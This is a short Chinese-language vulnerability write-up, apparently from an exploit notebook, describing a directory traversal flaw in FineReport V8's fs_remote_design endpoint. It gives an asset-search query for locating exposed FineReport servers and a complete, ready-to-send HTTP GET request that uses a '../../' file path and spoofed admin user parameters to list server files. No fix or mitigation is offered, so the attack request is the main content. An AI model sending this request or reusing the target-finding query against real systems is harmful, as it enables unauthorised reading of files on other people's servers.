登录 白背景
源码

帆软报表 V8 fs_remote_design目录遍历漏洞

一、漏洞简介

FineReport报表软件是一款纯Java编写的,集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。FineReport 8.0版本存在目录遍历漏洞,攻击者可利用漏洞读取网站任意文件。

二、影响版本

  • FineReport < v8.0

三、资产测绘

app="帆软-FineReport"

1713856438649-06eb167d-d167-4b7a-8c8d-8a1e8994ae3f.png

四、漏洞复现

GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../&currentUserName=admin&currentUserId=1&isWebReport=true HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Length: 230

1722262910571-3501986f-5cde-4e12-8ecf-21d725014926.png

原文: https://www.yuque.com/xiaokp7/ocvun2/hkvwmpcgm8z1aonr